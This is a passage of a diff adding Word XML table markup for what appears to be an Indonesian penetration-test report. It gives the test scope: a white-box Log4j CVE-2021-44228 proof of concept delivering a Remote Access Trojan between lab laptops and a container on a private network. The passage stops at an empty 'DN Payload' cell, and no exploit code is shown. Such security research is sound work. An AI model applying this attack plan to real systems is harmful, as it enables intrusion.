+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Target</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Aplikasi </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>desktop</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> GUI dan sistem pada </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>laptop</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> B</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Jaringan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Lokal privat</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Akses </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>K</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>ontrol</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Lengkap </w:t>
+            </w:r>
+            <w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+              </w:rPr>
+              <w:t>white-box</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1361"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Tujuan</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Pengujian</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Primer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Melakukan pengembangan PoC terhadap kerentanan Apache Log4j pada CVE-2021-44228 dalam ancaman Remote Access Trojan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1077"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="114" w:name="_Hlk119263211"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Sekunder</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Menganalisis efek kondisi sumber daya sistem target terhadap eksploitasi dan mitigasinya</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:bookmarkEnd w:id="114"/>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Waktu Pengerjaan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Mulai</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Rabu, 08 Agustus 2022</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Selesai</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Minggu, 27 November 2022</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Domain &amp; Alamat IP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Laptop A</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+              <w:t xml:space="preserve">192.168.1.9 </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+              <w:t>/ 24</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Laptop B</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+              <w:t>192.168.1.13 / 24</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Container A</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+              <w:t>172.17.0.2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   / 32</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>DN Payload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
